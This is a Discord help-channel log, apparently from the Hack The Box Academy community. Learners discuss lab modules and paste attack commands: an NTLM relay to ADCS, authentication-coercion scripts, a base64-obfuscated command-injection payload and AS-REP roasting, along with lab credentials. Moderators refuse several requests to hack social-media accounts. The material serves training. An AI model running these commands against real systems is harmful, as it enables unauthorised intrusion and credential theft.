#modules

1 messages · Page 444 of 1

proven plinth
#

I can actually rdp to it though

crystal cove
#

it worked @cloud urchin with the rockyou.txt file

opal shuttle
#

To know

cloud urchin
opal shuttle
#

@cloud urchin your reaction was fast than speed of light

#

@cloud urchin you are studying for next certification? Or on a break?

cloud urchin
#

on break

opal shuttle
crystal cove
south marten
#

hi, someone can help me in XSS hicjacking

opal shuttle
#

But your kali vm can only talk to rdp

#

And that one pc can only talk to rdp pc

#

So we are using RDP as a middle man

#

So convery our conversation with that internal pc

south marten
crystal cove
# opal shuttle Thats not connection issue,thats because that your RDP computer has connected b...

Thats the error i get, i didnt know it was because of that but thank you for the knowledge $ xfreerdp /u:eagle\bob /p:Slavi123 /v:10.129.204.151 /dynamic-resolution

[15:36:55:453] [9815:9816] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[15:36:55:453] [9815:9816] [WARN][com.freerdp.crypto] - CN = WS001.eagle.local
[15:36:56:654] [9815:9816] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_NO_LOGON_SERVERS [0xC000005E] from server
[15:36:56:654] [9815:9816] [ERROR][com.freerdp.core.nla] - SPNEGO failed with NTSTATUS: STATUS_NO_LOGON_SERVERS [0xC000005E]
[15:36:56:654] [9815:9816] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_AUTHENTICATION_FAILED [0x00020009]
[15:36:56:654] [9815:9816] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[15:36:56:654] [9815:9816] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1

left lintel
cloud urchin
cloud urchin
#

clg?

opal shuttle
opal shuttle
cloud urchin
#

oh, no

south marten
cloud urchin
#

never went to college

opal shuttle
#

👀

left lintel
crystal cove
opal shuttle
#

Yes

opal shuttle
cloud urchin
south marten
crystal cove
cloud urchin
crystal cove
#

i only have CEH and CISSP so my knowledge is limited

opal shuttle
#

Its superior

left lintel
#

if that makes sense

crystal cove
opal shuttle
silver ocean
#

If I am doing AEN blind...within how much time should AEN be be completed...so you have an idea about your preperation

left lintel
#

Idk I wouldn't think about it that way, just that if you can do the whole thing without looking at the module at all then you're most likely comfortable with the material and will be comfortable with the exam

earnest raven
#

I'm stuck on the last question of the kerberose attacks skills assesment. "The hint is If a user logs in, we can steal their identity." I've successfully done this but I can't do anything with the user. A nudge would be greatly appreciated.

gray yacht
nova void
#

hey i need help

crystal cove
#

broke into mine a bunch of times by clicking the "i forgot my password" button, then following the procedure

#

alzheimer is hitting sooner than expected 🙁

wise kettle
#

Hi

nova void
#

and i dont have access to anything email phone number nothing

crystal cove
#

contact support ?

nova void
#

that didnt work

#

thats why i searched for this server

wise kettle
nova void
#

how do i find one im scared to get scammed

wise kettle
#

Yo have to pay for them

nova void
#

yeah thats not a problem but where do i find one

wise kettle
#

Try to find one in here

crystal cove
#

which type of witchcraft do you think people here can do that they get access to an account that you dont have a email, phone number or @ ?

cloud urchin
#

@nova void We do not condone illegal activity in this server.

nova void
#

sorry i was just asking

crystal cove
#

telepathy ?

cloud urchin
#

Contact instagram, that is your only recourse. Anyone telling you otherwise is scamming you.

wise kettle
#

Thats it

rain fulcrum
#

Greetings Everyone! I'm doing the Intro to Networks module and there're two questions I know I'm answering right but it's telling me otherwise. Has this happened before?

crystal cove
# nova void sybau

what a boomer feeling to have to google a word to find out its a new "young people expression" 😢

heavy torrent
#

I suggest reading the module again. Most of the time, is a little detail, that you're missing.

rain fulcrum
heavy torrent
#

It is usually a small detail.

#

Check again.

pure cosmos
#

Hi there! Is there a problem on the target VMs ? It's been 15min spawning now

heavy torrent
pure cosmos
#

Oh gosh I had to ask for it to work now

#

nvm it spawned 😅

hollow kernel
#

anyone can help me please? I dont know why I get this error

harsh sundial
#

hello everyone i am currently in the footprinting module at dns and i don't understand what to answer on the question ?

proven plinth
#

This may have worked already. If you look at the example provided in the material, it's the same as your output

#

If you don't see anything in ntlmrelayx, then maybe there's something wrong

gray yacht
#

Please refrain from posting content from modules above Tier 0. You can shape this in a question that doesn't spoil content though.

gray yacht
hollow kernel
#

yes

gray yacht
# hollow kernel yes

Go ahead and DM your screenshot and some information and I'll see if anything sticks out.

hollow kernel
#

I have an error with ntlmrelayx

#

ok

mossy hemlock
#

Hi.... please I'm trying to install knock subdomain on and I'm running into some issues. I have no idea what I'm doing

#

I'd appreciate it if anyone could be of assistance. Thank you

fathom pendant
harsh sundial
#

hey is there anyone that can maybe give me an extra resource for the footprinting dns module

#

i have read the entire section but still struggling with the excercises at the bottom

mossy hemlock
fathom pendant
# mossy hemlock My apologies. This is not related to any module. I've tried checking online for ...

Then this isnt the right channel to ask in. This channel is for help with https://academy.hackthebox.com modules. I suggest reading #welcome to see what the whole server is about. You should be able to post in #1024429874246590575

mossy hemlock
proven plinth
harsh sundial
fathom pendant
#

Well. Sometimes you gotta dig a little deeper for records

proven plinth
harsh sundial
ancient coyote
#

Password Attacks Pass the Certificate
I am receiving this error when using gettgtpkinit.py ?
Error Name: KRB_AP_ERR_SKEW Detail: "The clock skew is too great"

ancient coyote
#

This message from the Kerberos authentication server appears if the difference in system time between the LDAP and IWSVA servers is too large (more than three or four minutes).

heavy torrent
#

correct

#

and how do you fix that?

#

this goes back to how kerberos work

#

Your answer or what you have to do, relies on this: *"The clock skew is too great"

ancient coyote
#

right Kerberos uses the timestamp as part of its method to issue tickets

#

Faketime utility can be used to spoof, but how to use with gettgtpkinit?

heavy torrent
#

adjust the clock

#

On Kali

#

you can do that with tools, or manually

#

Again, if you Google the error, it will bring you to the same folks who face that issue and the tools they used

ancient coyote
#

beautiful

#

can I drop the fix here for others?

ancient coyote
warped vine
#

Hello

astral vine
fathom pendant
#

@vague ruin deleted your messages because they appeared wholly unrelated to the channel and just flooded it with nonsense

astral vine
#

Ah that’s what was deleted lol

#

I just saw a wall go bye bye

warped vine
#

Does anyone know if I can use the app from my mobile or if it is exclusive to PC?

left lintel
vague ruin
#

@fathom pendant how ??

rain fulcrum
fathom pendant
limber river
#

I really miss the MD cheatsheet , easy to read

fathom pendant
#

short answer: just use nxc it's literally the same as cme

#

also i consider not sharing screenshots that could contain credentials; always redact

#

especially since it's above tier 0

quartz sundial
fathom pendant
#

crackmapexec is no longer maintained, so there's very little reason to use it. NXC is the same tool maintained by the people that were responsible for crackmap's maintenance. They had a falling out with the CME repo owner (to put it politely)

quartz sundial
fathom pendant
#

a hash can still be used as credentials

#

:)

fathom pendant
#

i believe they're planning on eventually renaming the module

#

it's just not a priority in the pipeline

quartz sundial
fathom pendant
#

well renaming the module to reference the tool netexec instead of crackmapexec

quartz sundial
#

aaaaaah, I see what you meant. great, in that case the question is closed) everything works fine with NetExec

#

thanks)

hexed hedge
#

think i have to send a msg in here

full echo
#

What have you tried so far and what is your concern regarding the exercise question?

brave field
#

Ok but finding the answer from the example was not the way to go.

grizzled schooner
#

Verified answer w current wordlist - just would have taken a while

small scroll
#

I'm stuck on the Password stuffing section of the password attacks module. I already looked through all cnf files in /ect/mysql, didn't find a single thing. Also tried stuffing the sql server with default credentials from defaultcreds. Please give me some help.

fathom pendant
ancient coyote
#

Password Attacks Pass the Certificate
Getting Certificate ID when running ntlmrelayx but it is not writing to a file and has multiple errors lines 1043,42,82,113,68

#

nvm gpt fixed it

fathom pendant
#

one of those is indeed correct; as i said. the first step is ssh into the system first with the given credentials

fathom pendant
#

no

cloud urchin
#

@small scroll please take care not to post content from modules above tier 0.

small scroll
#

where do i ask them then?

ancient coyote
fathom pendant
#

i don't recall changing too much from the example command aside from the ips

#

¯_(ツ)_/¯

#

make sure the target didn't die as well

small scroll
#

whats the difference between having space after -p and not having space?

junior flicker
#

Hey Everyone, working on the Password Attacks module Attacking Windows Credential Manager exercise. I can switch to mcharles and found the Administrator password and can open CMD as Admin, but I don't see mimikatz or any of the other tools from the section. What am I missing?

fathom pendant
#

this is evident by the error

fathom pendant
junior flicker
#

Gotcha

small scroll
fathom pendant
#

with rdp targets i like adding /drive:/some/path/to/share,linux it gets mounted on the remote system under the share \\tsclient\linux

junior flicker
#

Thank you

fathom pendant
#

@junior flicker got it solved? :)

junior flicker
ancient coyote
#

guys do I do the skills assessment tonight or tomorrow morn

fathom pendant
#

sorry meant to at someone else @junior flicker 😓

fathom pendant
junior flicker
fathom pendant
heavy dome
#

@fathom pendant why delete my msg

fathom pendant
heavy dome
#

OK!, u can help me ?

fathom pendant
small scroll
# fathom pendant all good?

there has to be space between -u and <username> right? I tried the default passwords and the given password on multiple accounts. Access denied.

heavy dome
fathom pendant
fathom pendant
small scroll
fathom pendant
#

yes

#

[that warning is telling me that using password on the command line is insecure]

small scroll
#

did you use sam as the username?

fathom pendant
fathom pendant
#

the database (cli tool) gives you
service | username | password

small scroll
#

uh, what default database?

fathom pendant
#

you shared its output earlier kek (it got yeeted bc the module is above t0)

fathom pendant
#

it's a small list so at least it's simple :D

small scroll
#

i thought i had to use the users on the machine

fathom pendant
#

nope

#

first thing to generally try should be defaults

small scroll
#

ty

vernal jacinth
#

how to do

fathom pendant
#

@vernal jacinth this isn't that kind of server and that link requires someone to be logged in to facebook to view

cloud urchin
fathom pendant
#

not sure what you need help with because I didn't open the fb link. But this isn't a hacker for hire server, or a server to look for anything illegal

vernal jacinth
#

Are you asking,
"Will they teach about hacking on this server?"

fathom pendant
#

if so, then yes we do teach about legal hacking, not hacking into stuff like facebook or instagram or none of that nonsense

vernal jacinth
#

"Like doing it on Facebook and Instagram, right?"

fathom pendant
#

no

#

i explicitly stated NOT hacking facebook or instagram

#

if that's what you're interested in doing, then this server isn't for you.

vernal jacinth
#

There aren’t any websites to hack Facebook and Instagram, right?

fathom pendant
#

sigh that is ILLEGAL

#

so NO

slate palm
fathom pendant
pseudo crown
#

Hey guys, just bought the vip for a month any roadmap or machines you recommend how can I make the best use of this

cloud urchin
#

complete the paths that interest you the most

fathom pendant
pseudo crown
#

Yeap the vip for htb labs

#

Alright then looking into the retired machine writeups

nocturne bluff
#

MarioWooDance Just finished my Masters degree in Cyber, decided to hop into HTB this will be fun

fathom pendant
mighty harness
#

guys is this normal? why do i got 0 cube for few questions?

acoustic owl
mighty harness
waxen totem
acoustic owl
#

You get 20% of the cubes back from the cost of a module.
So if a module costs 100 cubes, you get 20 cubes back

fathom pendant
tribal lark
lime hollow
#

jesus chirst what is this images quality of this module.

wooden seal
fathom pendant
granite vector
#

Nice

wooden seal
#

you picked the wrong server my fren ~ big smoke

granite vector
#

Ahhh

#

Am I banned now?

fathom pendant
#

@granite vector this server isn't for finding out how to hack your ex's instagram. (if you want to know what this server is about feel free to read #welcome) but tl;dr you're not gonna learn how to do illegal shit here.
If you wanna learn hacking in a way that won't get you in legal trouble you're more than welcome to sign up for a hackthebox account https://hackthebox.com and start your journey there.
You can also link your account to the discord in order to see what else this server has to offer

autumn pilot
#

reach out to the appropriate authorities

#

we cannot help

fathom pendant
#

@granite vector as stated by @autumn pilot this is something for the authorities, this server isn't a hacker for hire server. At best it's more appropriate to find a Private Investigator in your area to help.

granite vector
#

I understand thank you

fathom pendant
#

on an unrelated note;
redoing the password attacks skill assessment and LMAO i completely missed the plaintext creds in the output kek blindness

granite osprey
#

Hi,
I’m trying the File Upload Attacks assessment and I’m stuck. I can upload files and see them in the upload folder, but my PHP never runs. I tried tricks like (valid) double extensions. and also adding PHP after a valid image, but the code still just shows up as text. Maybe I’m missing something basic? Any small hint would help a lot.
Thanks!

eager spindle
#

https://academy.hackthebox.com/module/147/section/1335 I need help, impacket-ntlmrelayx -t http://10.129.217.242/certsrv/certfnsh.asp --adcs --template 'EFS' -smb2support I used this command and then used python3 /usr/lib/python3/dist-packages/nxc/modules/coerce_plus.py --listener 10.10.16.42 INLANEFREIGHT.LOCAL\\wwhite:'package5shores_topher1'@10.129.217.242 but there is no output

vapid jackal
#

Hello

fathom pendant
fathom pendant
#

and the other stuff mentioned in the module, it'll make your life way easier

vague cedar
#

could someone help me in "privileged access" module in active directory enumeration and attacks

eager spindle
# fathom pendant also i suggest using the template provided by the module

I reused the module's impacket-ntlmrelayx -t http://10.129.217.242/certsrv/certfnsh.asp --adcs -smb2support --template User and then used python3 /usr/lib/python3/dist-packages/nxc/modules/printerbug.py INLANEFREIGHT.LOCAL/wwhite:"package5shores_topher1"@10.129.217.242 10.10.16.42, but still no output.

#

I'm not sure how to fill in the "--template" value, but I did some research and it told me to select "enable=true" and "Enrollment Rights": [
"INLANEFREIGHT.LOCAL\Domain Admins",
"INLANEFREIGHT.LOCAL\Domain Users",
"INLANEFREIGHT.LOCAL\Enterprise Admins"
]

fathom pendant
#

you fill out the --template option with a valid template, you can discover templates with certipy

#

if you want to know what to look for with it; but again -- we are already given the information about which template to use by the reading

vague cedar
# brave field ask your query please

in this question "What other user in the domain has CanPSRemote rights to a host?" i got the user, b-----. Then for the next ques "What host can this user access via WinRM? (just the computer name)". i found a computer object's full sid which i resolved using "Get-ADComputer -Filter { ObjectSID -eq $sid } | Select-Object Name". but it turns out to be wrong answer

fathom pendant
#

not Academy-EA-Attack01.inlanefreight.local

vague cedar
#

yea i entered that ACADEMY-EA-XXXX

fathom pendant
#

make sure no extra spaces

#

i'd also try refreshing the page to be extra sure

vague cedar
#

wait I'll, try again just to be sure

zealous folio
#

Can someone here help me?

eager spindle
fathom pendant
vague cedar
#

it is not the answer

fathom pendant
#

give me a minute to sanity check

#

what section is this again?

vague cedar
#

privileged access

fathom pendant
#

yep that is 100% not the right answer, look for other machines

vague cedar
#

i ran sharphound on the academy machine and transferred the result and ran bloodhound on my VM, does this method work?

pseudo crown
#

Any one know a fix for the machine.htb now showing up on the website despite of adding in /etc/hosts and stuff?

brave field
#

Make sure to use the compatible version of sharphound as listed in the bloodhound-ce collectors if you're using the community edition

granite osprey
#

Hi,
I’ve asked the same question about the File Upload Attacks assessment twice in the last 24 hours and I haven’t received any answer. I am stuck and I just need a small hint to move forward. Could someone please take a moment to give me some guidance? Thanks.

fathom pendant
#

my notes state i had to do some experimentation to find the appropriate one

#

(god i love canvas lol)

#

i also noted (used an existing file image to craft a malicious file)

fathom pendant
vague cedar
eager spindle
fathom pendant
#

one is for the certificate/key server, the other is for the dc

granite osprey
# fathom pendant not all php extensions are created equal

Thanks. I did identify the PHP extension you mentioned, and I also tried by taking a normal image and adding PHP code inside it. The file uploads fine, but when I access it the PHP is never interpreted — it just shows up as plain text.

shell prawn
#

hello

fathom pendant
#

a successful upload doesn't automatically mean it's going to execute

#

if you used burpsuite i'd look through the list of successful uploads (filter by size when looking at the requests)

#

@shell prawn be careful not to share answers in your screenshots

shell prawn
#

Okay

fathom pendant
#

¯_(ツ)_/¯

shell prawn
#

Actually I am a newbie and I've spent about 2 hours on this question trying different prompts but I can't seem to find the correct answer

granite osprey
fathom pendant
#

at the top bar you have the different columns, if you click it'll sort in ascending (or descending) size

eager spindle
#

10.129.217.242 (ACADEMY-PWATTCK-PTCDC01) ,10.129.142.171 (ACADEMY-PWATTCK-PTCCA01)

heady sapphire
#

Hello I am in password attacks it pash the ticket attacks from windows module but I struggle . It says pass the ticket for user John but when I use mimikatz I don’t capture ticket for user John

fathom pendant
granite osprey
fathom pendant
#

looks like service account vs non-service

#

@quartz sundial careful of spoiling info for modules above tier 0 btw

quartz sundial
#

no disclosure)

fathom pendant
quartz sundial
#

If it will be legitimate, if I blur images/commands?

radiant stirrup
#

Hi there, on module Command Injection, Advanced Command Obfuscation. I can't figure out how to get the command to work. Stuck for a day now. I used Base64 encoding, but nothing seems to work. Can anyone help me please?
`echo -n 'find /usr/share/ | grep root | grep mysql | tail -n 1' | base64
ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=

ip=127.0.0.1%0abash<<<$(base64%09-d<<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=)`

past wagon
#

Hey guys i need some help on the the advanced xss and csrf exploitation module skills assessment, i managed to become a moderator but am stuck in trying to get a working xss payload via the file upload functionality and task management, i get blocked everytime by CSP..Kindly assist..

dry falcon
#

https://academy.hackthebox.com/module/67/section/605
how to do this section Print Operators of module Windows Privilege Escalation , its giveing so many errors , i sutck on it from 2-3 days. 🥲 , can u provie ur notes of this section Print Operatorsor how u did it .

dry falcon
# plain charm whats the issue?

32 not wokring and when try to use 61 it saying to enter id:pass . that should not happen i guess , even i enter id pass it show product key activation error.

#

anyone knows how to do it ? sadglas hugthebox

plain charm
#

tbh, I didn't use the akagi64.exe for this. The module suggest you to load a vulnerable driver and use a different tool for gaining a privileged shell

#

if you load the vulnerable driver, the sugested tool should suffice

#

I guess its called exploitCapCom

dry falcon
#

still error

#

SeLoadDriverPrivilege Failed not there

plain charm
#

You will need to bypass UAC

dry falcon
plain charm
#

the module suggests using UACMe

#

and i don't recommend using tools not suggested by the module. this will only cause headache

plain charm
#

yeah

#

also delete your videos and try not to use them as it contains spoiler commands

dry falcon
past wagon
#

@tired flax heyy did you find a solution im stuck and need some help

gray yacht
acoustic owl
vague rivet
#

Guys I need help, the Pivoting and Tunelling module, skills assessment part. I'm unable to pivot using proxychains, whenever I bg the shell from the webserver and then try to use proxychains, it keeps dying. Any tips to keep it runnning and achieve pivoting?

devout lily
#

does anyone know why nmap is taking so many time?

tribal lark
devout lily
tribal lark
fathom pendant
#

it's still working

storm elk
#

press any button - it will display progress

fathom pendant
#

if you press any key it displays progress

devout lily
fathom pendant
#

yes

devout lily
plain charm
fathom pendant
#

in these cases i heavily suggest adding -sT to the command

tribal lark
storm elk
#

kek @tribal lark

fathom pendant
devout lily
#

it works, really really slow

fathom pendant
#

i default to the right arrow key

tribal lark
gray yacht
opal shuttle
#

I guess printerbug is not working properly

gray yacht
#

So I would either download printerbug.py or you can try using the netexec module for funsies:

[*] coerce_plus module options:

        LISTENER       LISTENER for exploitation (default: 127.0.0.1)
        ALWAYS         Always continue to all exploit (default: False)
        METHOD         Exploit method (Petitpotam, DFSCoerce, ShadowCoerce, Printerbug, MSEven, All   default: All)
        M              Alias for METHOD
        L              Alias for LISTENER```
#

Also deleting this due to it spoiling content over Tier 0

eager spindle
#

@gray yacht @opal shuttle Thank you, it is indeed a problem with printerbug.py

grand timber
#

It mentions it in the README portion, but im not seeing it, Or im missing it

misty matrix
#

Am i the only one who comes across unstable machines for offensive module issues? For exmpl, on shell&payloads, the machines are up and then end up not responding, barely an nmap later.

flint palm
#

no you are not the only one. hackthebox has many machines which have bugs

grand timber
#

I just have the issue of HTB constantly setting off my antivirus lol

terse bloom
#

Hello, the user and password list for the Attacking Common Services --> Email Services does not work, provided in the resources?

fathom pendant
grand timber
fathom pendant
terse bloom
grand timber
terse bloom
terse bloom
fathom pendant
#

and did you use the username format user@domain ?

#

(assuming you got q1)

terse bloom
fathom pendant
terse bloom
grand timber
grand timber
#

oops thanks XD

#

I just notcied right as you sent it

fathom pendant
waxen totem
#

Tariffs

plucky sigil
#

This question came to my mind after working with captive portal modules:
My captive portal shows my MAC/IP (192.168.101.135) and traffic stats (1136.6 MB up / 4.1 GB down). But I've seen claims that captive portal traffic numbers don't reflect real client consumption.
How is this possible? If the portal tracks my specific device, shouldn't the upload/ download numbers be accurate?
What technical reasons could cause captive portal statistics to be inflated or inaccurate compared to actual internet usage?

fathom pendant
novel valve
#

Hey Guys,
i'm stuck on File Upload Module.. have upload a webshell with shell.php/.jpg, but cant it at /profile_images/shell.php/.jpg?cmd=id and /profile_images/.jpg?cmd=id too... i found in /.jpg?cmd=id just encrypted things, no result ...can anyone help me? when its not allowed to post the result then pm me pls

river grove
#

Hello.

Would appreciate a nudge on what's wrong with my payload on Advanced Deserialization Attacks: JSON prayge

fathom pendant
novel valve
fathom pendant
novel valve
#

but burp in truder says successfully, so anyw her e it must be

novel valve
fathom pendant
novel valve
#

😄

fathom pendant
novel valve
#

i will try it tomorrow my brain is shutting down

#

thx ^^

plucky sigil
fathom pendant
plucky sigil
teal arrow
#

Module: File Inclusion
Lesson: PHP wrappers

Question: Try to gain RCE using one of the PHP wrappers and read the flag at /

After I check PHP configurations, and encode the PHP web shell to base64, I'm a bit lost as to what comes next. I'm trying to use this command: curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"

A little nudge?

fathom pendant
teal arrow
#

got the flag, thanks

opal ravine
#

is there separate channel for pro labs

quartz ridge
#

hi guys , how r you ?

#

in my browser i cant find storage unit in devtools

#

how can i see ?

gray yacht
uncut crown
#

I am on the Nessus vuln scanning module. I have connected to the target via ssh, but when I use dpkg, it says it's not found. Am I supposed to do this a different way?

sick stump
#

Oh ok nevermind I tried something ippsec usually does and it somehow worked, binge watching his vids has helped me again

crystal cove
#

Hi chat, how does one gains access to the off topic rooms ?

cloud urchin
crystal cove
#

i did the verication already. Isnt that what the green mark next to my name stands for ?

#

never mind, i only leaked my token...

#

now its done

sudden crown
#

Hi everyone im having trouble connecting to target machine using ssh, it always returns an error massage saying "Connection closed by <ip> port 22". what can i do to resolve this issue?

vagrant bluff
#

You must not be connected to the VPN

#

Download it and use “sudo openvpn <name.ovpn>” then try

vapid maple
#

or if your using Kali, you can import it as an openvpn connection profile. Thats what I did

white crest
#

Hi everyone. Having some issues with the Linux Privilege Escalation module, wondered if anyone could help?

#

I'm on the capabilities section. Every time I try to SSH in, I either get no response, or if I do manage to login my SSH window will lock up after about 10 seconds

#

This is happening both on PWNbox and on my own lab machine

#

Could anyone else confirm if it is happening to them as well, or if it's just something on my end

vapid maple
#

I had the same issue. I had to reset the machine 3 or 4 times to make it work

white crest
#

I've restarted it about 10 times by now

vapid maple
#

did you make sure your trying to change the right capability?

sudden crown
#

it returns he same issue even when connected to the vpn too

white crest
vapid maple
#

you may have to raise a trouble ticket if its happening as soon you connect. that shouldnt be happening

white crest
#

Not even a "host unreachable" response

#

Just no response at all

#

when they do come through the ping time is all over the place

vapid maple
#

maybe their network on that segmet is overloaded

white crest
#

Perhaps. I tried last night and Im trying again now, and its the exact same issue

#

seems pretty consistent

vapid maple
#

maybe try a lower utlized vpn server, just remember you will have to download a new vpn connection profile to your local box

white crest
#

I'm doing it through PWNbox

#

I'll try a different region though

vapid maple
#

ah, then maybe raise a trouble ticket so they are aware

white crest
#

Will do. thanks for your help, it's been driving me crazy

vapid maple
#

Ive ran into a few boxes where I just had to keep restarting them, Ive never used the PWNbox though

white crest
#

Yep, same issue with DE pwnbox that UK had. Must be an issue on their end

#

I'll raise a ticket

acoustic owl
#

What interests you? Do you have any prior knowledge?

silent kindle
#

Hi, I'm trying to send a file from the target machine back to attack machine but I'm getting connection time out. Not sure what I'm doing wrong. Need some help ty

left lintel
#

Did you just buy 5000 cubes outright?

#

Interesting choice

#

I mean nothing just that if you buy them monthly it’s $340 basically instead of $500

left lintel
# silent kindle any help?

If you’re using xfreerdp to get into the machine just attach a folder as a drive and move it that way

silent kindle
#

yeah, but I want to figure out how to do it scp way

crystal cove
#

dumb question (but it happened to me), is the target there ?

static slate
sick stump
#

I officially hate windows

static slate
#

Why limit yourself to LaZagne?

sick stump
sleek bear
#

hi everyone i was just going through the Wi-Fi Password Cracking Techniques module and one of the questions ask me to use the OneRuleToRuleThemStill rule. first its not inside the rules directory or the current directory second when i want to copy the rule from github and paste it it just wont paste it and yes im in root anyone had such a problem? https://academy.hackthebox.com/module/312/section/3723

cloud urchin
slow hare
#

Guys hello am new in htb can someone pls help me how to connect to this cause i dont really know ty

heady sapphire
#

Hello ! I am in password attacks in the pash the ticket from Linux chapter and I have a question about the last exercise (I mean the last mandatory one ) . Let’s say I have access to /etc/krb5.keytab . How can I impersonate a user ? Also how can I know who are the possible users I can impersonate ?

fathom pendant
heady sapphire
#

But how ? I don’t understand the use of krb5.keytab

#

It does not work with the usual way of exporting it in the env variable

slow hare
fathom pendant
#

It gives all kind of information about the server, and even instructions to link your htb account to the server

fathom pendant
heady sapphire
#

iirc? So if I have access to a file I can impersonate anything inside it ?

#

How can I know all the possible users I can impersonate ?

fathom pendant
fathom pendant
heady sapphire
#

Only for one user ? How can I know which one ? I mean his exact username ?

fathom pendant
#

I believe the module goes over how to enumerate a keytab file

#

And dig into its principal info

heady sapphire
#

No this file it’s different from the others

fathom pendant
normal field
#

Hi guys, new to HTB. I've been working with Intro to Network Traffic Analysis and the questions is asking to use 'tcpdump' to save the file. I wrote it in the command line to save the file but it's been nearly an hour and it's still going...am I doing something wrong?

fathom pendant
#

Also you didnt specify the length so it'll capture until you tell it to stop

ancient coyote
#

Password Attacks (Skills Assessment - Password Attacks)

Tips on pivoting to other internal machines after getting into the DMZ?
Ive tried establishing the SOCKS proxy to reach internal IPs but dont have proxychains
Does proxychains need to be moved to the machine? or is there another way?

#

I've also found creds for a user on an internal machine just cant reach it yet

fathom pendant
barren apex
#

when will we get the season 8 prizes?

fathom pendant
barren apex
#

oh, sorry thought I'm typing in general

ancient coyote
fathom pendant
ancient coyote
#

I see

fathom pendant
#

if you have an annual sub, the writeup author actually uses ligolo for this

ancient coyote
#

I do indeed have the annual sub I just try to avoid looking at the writeup when i can

#

Ill allow it this time tho FeelsWeirdMan

fathom pendant
#

i just more meant if you wanna dig into alternative methods or thoughts of doing it

#

it's doable with stuff like proxychains and chisel

ancient coyote
#

does academy use community content, Like if I was to make a sweet guide on Ligolo would they use it in a module?

fathom pendant
#

they may add ligolo to the pivoting module, worth throwing a /feedback for it

ancient coyote
#

I'll do that, is there a channel here that i could throw a ligolo guide into whenever I make it ?

fathom pendant
vernal hamlet
#

Hello There ,im solving Intro to C2 Operations with Sliver Module and iv been digging in the last question couldnt figure it out if anyone can give me hint or help me i will he glad

fathom pendant
#

@merry mesa this isn't a hacker for hire server (see #rules )

ancient coyote
#

Finally completed Password attacks

#

is finishing these in 15 days a reasonable time line ?

#

That was the OG goal to have up to SQLmap done by september

cloud urchin
#

instead of focusing on speed of completion, i'd focus on understanding of the material

ancient coyote
#

Yeah that is the goal but to stay on schedule I was just wondering

#

I have plenty time I want to take CPTS in january

#

and november/december are currently dedicated to doing boxes for muscle memory

#

so I may need to push boxes to only december and use novemember to wrap up the last few modules

thin dew
left lintel
ancient coyote
#

"The Password Attacks module was the big outlier, taking a whopping 144% more time than estimated. And that’s not counting the wait time during brute force attacks, which added even more. That module was a real drag."

Glad I am not the only one

left lintel
#

Yep, same for me took longer then the estimated time, everything else was roughly accurate or usually took less time

fathom pendant
#

fun fact; the password attacks module used to be worse on the time wasting -- the recent update cut out a significant amount of waiting

fathom pendant
#

for the section using the firefoxdecrypt tool... you first had to find kira... yeah.... it wasn't great

harsh gorge
#

I'm having some trouble with the skills assement for CME. I've tried rid-bruting and asreproasting the users. But I keep getting KDC_CLIENT_REVOKED. Then it just quits on me. Did anyone have the same error?

[Aug 14, 2025 - 22:37:24 (CDT)] exegol-default skillsassement # proxychains -q nxc ldap dc01.inlanefreight.local -u skusers.txt -p '' --asreproast skasreproast.out                                                         
LDAP        172.16.15.3     389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:INLANEFREIGHT.LOCAL) (signing:None) (channel binding:Never) 
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
austere hearth
#

Does anyone know why I can only type here?

austere hearth
fathom pendant
austere hearth
#

Thank you

sage sleet
#

hey i am a complete beginner how do i start and from where

compact patrolBOT
orchid monolith
#

Hello I try to use zap replacer in module using web proxy but It doesn't work, I don't understand what is the reason?

foggy aspen
#

Hi, I am also stuck not being able to access www.inlanefreight.com. ping 8.8.8.8 works fine, but can't curl www.google.com. Are you referring to or own VPN or the pwnbox vpn? disconneting my own VPN doesn't change anything, and I couldn't find any VPN settings on the pwnbox. A bit lost with my newbie skills here, any pointers where to look?

waxen totem
#

If you can't connect to any website at all I'd check your network settings, although I do believe that the pwnbox has a limited internet connection

foggy aspen
waxen totem
foggy aspen
#

pardon my wording, its still confusing at times: I open the what I assume is a VM from within the accedemy, with Desktop, terminal, and firefox browser. From that firefox browser, internet is not accessible, at least inlanefreight.com

waxen totem
foggy aspen
#

yes, the pwnbox you have access to for 120 minutes. not using their internet at all, just now for sovling the exercise. I mean that amount of internet connecting should be granted, no?

waxen totem
foggy aspen
waxen totem
#

I'm assuming this is for the Linux Fundamentals module?

foggy aspen
#

Yes correct

foggy aspen
waxen totem
foggy aspen
waxen totem
#

@foggy aspen can you do a full refresh Ctrl + f5 and try to spawn it again?

foggy aspen
waxen totem
foggy aspen
waxen totem
#

-# also just for clarification, Discord moderators are NOT staff, we're volunteers

foggy aspen
vagrant walrus
#

how can i start?

waxen totem
compact patrolBOT
waxen totem
#

@vagrant walrus

reef axle
#

As the new update for CBBH -> CWSE will remove some modules for example hacking wordpress, will they remain achievable, are they just removed from the path or enitrely from HTB

rotund sphinx
#

hi,
has anyone else had issues with the SocksOverRDP part of "Pivoting, Tunneling and Port Forwarding" ?
windows defender on the target appears to be detecting + removing the SocksOverRDP-Plugin.dll as soon as i unzip it
im not sure if im doing something wrong, if the env is bugged, or if i am meant to know how to get past windows defender by this point

#

just noticed the hint so guess its option 3 🙁 , im so bad at this :p

heavy mango
rotund sphinx
#

i think i managed it once i realised that getting around defender was part of it

grizzled iron
#

Is there any chance can help me? Because in my Current Path Junior Cybersecurity Analyst
the module in Components of a Network the the question
"What type of cable is used to connect components within a local area network for high-speed data transfer?"
My answers are:
Ethernet cable
LAN cable
RJ-45 cable
RJ-45 connector
Ethernet cable with RJ-45 connector

Still wrong answer.

Also here
"What type of network cable is used to transmit data over long distances with minimal signal loss?"
